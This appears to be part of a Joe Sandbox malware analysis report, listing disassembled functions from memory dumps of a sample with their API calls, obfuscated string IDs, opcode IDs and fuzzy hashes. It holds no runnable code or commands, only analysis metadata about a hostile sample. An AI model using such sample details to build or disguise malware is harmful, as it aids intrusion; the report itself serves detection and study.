                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                                          • API String ID: 0-2174627302
                                                                                                                                                                                                                                                                          • Opcode ID: f33d96a2bc0df413143d58eed916f3576d0cf951f49cf0b0560d95200afd1ae6
                                                                                                                                                                                                                                                                          • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f33d96a2bc0df413143d58eed916f3576d0cf951f49cf0b0560d95200afd1ae6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
                                                                                                                                                                                                                                                                          Function 0249FC64 Relevance: 17.1, Strings: 13, Instructions: 892COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                                                                                                                                                                                                                                          • API String ID: 0-2174627302
                                                                                                                                                                                                                                                                          • Opcode ID: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                                          • Instruction ID: 644d1e97a3f14a4678fe64c2e7f3881588794978f6ba8177889790537d47ce88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c149d579c2bfbe290bb8fc034ca28ef72b0ce807b879de6ec01245955241a86
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D727C7560C7808BD7249F38C4953AFBBE2ABD6314F198A2ED5DA87381D6798446CB03
                                                                                                                                                                                                                                                                          Function 024B8108 Relevance: 14.2, Strings: 11, Instructions: 461COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
                                                                                                                                                                                                                                                                          • API String ID: 0-898000180
                                                                                                                                                                                                                                                                          • Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                                          • Instruction ID: 2c30e31dff193efb6877e588cb2df0c72bb3293947671bd378e67ad73737e207
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32C10EB16483508BD715CF18C8917ABB7B2EFD2314F08896DE4D68B390E335C901C7A6
                                                                                                                                                                                                                                                                          Function 0042B4FC Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 519COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1$#v
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-820666829
                                                                                                                                                                                                                                                                          • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                          • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                          Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                          Function 024B3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                          • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                          • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction ID: 57884115f73a545973cdd85e813ae28e768ac0b03b9150b708654ebc8ab184ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E13242B0601B469FDB48CF26D580389BBB1FF45304F548698C9695FB5ADB35A8A2CFC0
                                                                                                                                                                                                                                                                          Function 00419770 Relevance: 10.0, APIs: 2, Strings: 3, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419CD6
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419D3B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M$#v
                                                                                                                                                                                                                                                                          • API String ID: 764372645-2531622275
                                                                                                                                                                                                                                                                          • Opcode ID: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
                                                                                                                                                                                                                                                                          • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1cb96ad93e9c481a5704f73790cbb95699375b1fb1093937e3726a0317c52ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                          Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                          • API String ID: 0-119712241
                                                                                                                                                                                                                                                                          • Opcode ID: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
                                                                                                                                                                                                                                                                          • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a30799564e50c90834a2424509ace6a7bad80dd76436b330a98f2931f18a1c6d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                          Function 024BB763 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-261129489
                                                                                                                                                                                                                                                                          • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                          • Instruction ID: d8023877f1d4f0a9fd76882124d92d38ceb2f3f40d54c865e1d6b88deb20c264
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0E1B67151C3C18AE775CF2584507FBBBD6EFD6208F1888AEC5D987292DB39410ACB26
                                                                                                                                                                                                                                                                          Function 024A99D7 Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-936430989
                                                                                                                                                                                                                                                                          • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction ID: c0b8439f0c26c5a6023c669713cfb19d18569ccc3e59d052a4a45f8e55fa5d3e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4482F6746083509FD764CF24D8A0B2FBBE2EBE6714F28892EE58547391D771D842CB46
                                                                                                                                                                                                                                                                          Function 024B1347 Relevance: 8.0, Strings: 6, Instructions: 536COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                                          • API String ID: 0-1072848446
                                                                                                                                                                                                                                                                          • Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                                          • Instruction ID: b9ba5027e44b9a988adada35061b53d227452ac9b061427721ea395862f94b23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53229D7160C7908FD3218B38C4643AFBBE1AF86314F188A2EE5DD87391D7759885CB62
                                                                                                                                                                                                                                                                          Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                          • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                          Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                          Function 024BC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                          • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction ID: 71bcb16d34c2afef8497121d6b07e83acbbc8df18cf3bd58003839770b83cb46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0B1D57510C3818EE369CF29C4D07ABBBD2AFD6314F188A6ED4D98B391DB748549C722
                                                                                                                                                                                                                                                                          Function 024989F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 02498A1B
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02498A25
                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02498AC2
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 02498AD7
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BC37: FreeLibrary.KERNEL32(02498BD2), ref: 0249BC3D
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BC37: FreeLibrary.KERNEL32 ref: 0249BC5E
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02498BD9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction ID: 3c22db29e3041e4883b340d1e0098570924b4724292bdb834f920f83e432cf9b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6417C77F4431807D71CAEB9DC9936AB69B9BC4314F0E803F6985AB390DE795C0696C0
                                                                                                                                                                                                                                                                          Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                          • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                          • Opcode ID: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
                                                                                                                                                                                                                                                                          • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                          Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                          • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                          • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                          • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                          Function 024B0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                          • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                          • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction ID: 069069d79d43cb6cf4bea0452027827898fb68567307262ae85d267941b464e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AD117B56083018BD724DF25C8527ABB7F2EF92319F18996DE4828F3A4F7799401CB52
                                                                                                                                                                                                                                                                          Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                          • API String ID: 0-923305466
                                                                                                                                                                                                                                                                          • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
